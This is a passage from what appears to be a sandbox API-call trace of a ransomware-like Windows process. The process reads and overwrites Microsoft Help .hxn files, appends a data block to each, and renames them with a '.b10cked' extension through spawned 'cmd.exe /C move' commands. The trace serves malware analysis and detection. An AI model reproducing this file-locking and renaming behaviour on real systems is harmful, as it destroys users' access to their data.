lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.743] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0198.743] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.743] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x158 [0198.743] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.743] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.743] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xab, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xab, lpOverlapped=0x0) returned 1 [0198.744] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.744] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xab, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xab, lpOverlapped=0x0) returned 1 [0198.744] SetFilePointer (in: hFile=0x120, lDistanceToMove=-171, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xad [0198.744] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xab, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xab, lpOverlapped=0x0) returned 1 [0198.744] SetFilePointer (in: hFile=0x120, lDistanceToMove=-171, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xad [0198.744] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xab, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xab, lpOverlapped=0x0) returned 1 [0198.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.POWERPNT.14.1033.hxn", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0198.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.POWERPNT.14.1033.hxn", cchWideChar=23, lpMultiByteStr=0x1328794, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.POWERPNT.14.1033.hxn", lpUsedDefaultChar=0x0) returned 23 [0198.748] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x158 [0198.748] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0198.748] CloseHandle (hObject=0x120) returned 1 [0198.749] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN") returned 0x27 [0198.749] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0198.750] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xe48, dwThreadId=0xfe4)) returned 1 [0198.760] CloseHandle (hObject=0x1b4) returned 1 [0198.760] CloseHandle (hObject=0x120) returned 1 [0198.760] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.760] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.760] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0198.760] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.760] ReleaseMutex (hMutex=0xf8) returned 1 [0198.760] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.760] ReleaseMutex (hMutex=0xf8) returned 1 [0198.760] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.760] ReleaseMutex (hMutex=0xf8) returned 1 [0198.760] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.761] ReleaseMutex (hMutex=0xf8) returned 1 [0198.761] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.761] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25555014786) returned 1 [0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x170 [0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x170 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x170 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.763] ReadFile (in: hFile=0x120, lpBuffer=0x12ea7f8, nNumberOfBytesToRead=0xb7, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesRead=0x12ec08*=0xb7, lpOverlapped=0x0) returned 1 [0198.764] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.764] WriteFile (in: hFile=0x120, lpBuffer=0x12ea7f8*, nNumberOfBytesToWrite=0xb7, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesWritten=0x12ec1c*=0xb7, lpOverlapped=0x0) returned 1 [0198.764] SetFilePointer (in: hFile=0x120, lDistanceToMove=-183, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb9 [0198.764] ReadFile (in: hFile=0x120, lpBuffer=0x12ea7f8, nNumberOfBytesToRead=0xb7, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesRead=0x12ec08*=0xb7, lpOverlapped=0x0) returned 1 [0198.764] SetFilePointer (in: hFile=0x120, lDistanceToMove=-183, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb9 [0198.764] WriteFile (in: hFile=0x120, lpBuffer=0x12ea7f8*, nNumberOfBytesToWrite=0xb7, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesWritten=0x12ec1c*=0xb7, lpOverlapped=0x0) returned 1 [0198.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.POWERPNT.DEV.14.1033.hxn", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0198.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.POWERPNT.DEV.14.1033.hxn", cchWideChar=27, lpMultiByteStr=0x132f75c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.POWERPNT.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 27 [0198.768] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x170 [0198.768] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0198.768] CloseHandle (hObject=0x120) returned 1 [0198.769] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN") returned 0x27 [0198.769] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0198.770] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.DEV.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.DEV.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xf58, dwThreadId=0xfec)) returned 1 [0198.784] CloseHandle (hObject=0x1b4) returned 1 [0198.784] CloseHandle (hObject=0x120) returned 1 [0198.784] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.784] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.784] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0198.784] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.784] ReleaseMutex (hMutex=0xf8) returned 1 [0198.784] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.784] ReleaseMutex (hMutex=0xf8) returned 1 [0198.784] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.784] ReleaseMutex (hMutex=0xf8) returned 1 [0198.784] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.784] ReleaseMutex (hMutex=0xf8) returned 1 [0198.785] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.setlang.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.785] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25557410727) returned 1 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x152 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x152 [0198.786] SetFilePointer (in: hFile=0x120, 